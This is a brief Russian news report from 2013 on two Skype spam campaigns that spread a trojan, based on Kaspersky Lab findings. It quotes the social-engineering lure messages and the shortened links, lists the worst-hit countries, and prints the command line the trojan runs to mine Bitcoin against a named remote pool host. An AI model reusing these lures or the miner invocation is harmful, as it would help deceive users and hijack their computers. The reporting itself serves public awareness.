В Skype распространяется новый троян


KasperskyLabsЭкспертом Лаборатории Касперского было обнаружено сразу две масштабные кампании по распространению в Skype нового трояна.

В первом случае - после инфицирования система жертвы становится частью ботнета, связываясь с C&C-сервером при помощи IRC протокола.

Жертвы получают сообщения вида:

  • "Оцени мою новую фотографию";
  • "Самое смешное фото";
  • "Мне нравится твое фото";
  • "Стоит ли добавить это фото на Facebook?" и т.п.


Далее предлагается пройти по одной из ссылок:

  • http://www.goo.gl/XXXXX?image=IMG0540250-JPG;
  • http://www.goo.gl/XXXXX?image=IMG0540250-JPG.


Частота кликов по вредоносным ссылкам достигала 10 тыс. в час (2,7 в секунду). Наибольшее количество жертв зафиксировано в:

  • России;
  • Украине;
  • Китае;
  • Италии;
  • Болгарии;
  • Тайване.


Во втором случае - пользователи также получают сообщение и ссылку. Однако с тем отличием, что инфицированный компьютер становится под контролем злоумышленников, используемым для генерирования электронной валюты Bitcoin. Оказавшись на компьютере пользователя, троян запускает команду

  • bitcoin-miner.exe -a 60 -l no -o http://suppp.cantvenlinea.biz:1942/ -u Этот e-mail адрес защищен от спам-ботов, для его просмотра у Вас должен быть включен Javascript -p XXXXXXXX

при этом нагрузка на CPU инфицированной системы значительно возрастает.

Частота кликов достигала 2 тыс. в час. Наибольшее число пострадавших в:

  • России;
  • Польше;
  • Коста-Рике;
  • Испании;
  • Германии;
  • Украине.


Троян распространяется с сервера, находящегося в Индии - Hotfile.com service, а также с С2 сервера в Германии.


Обновлено (08.04.2013 13:57)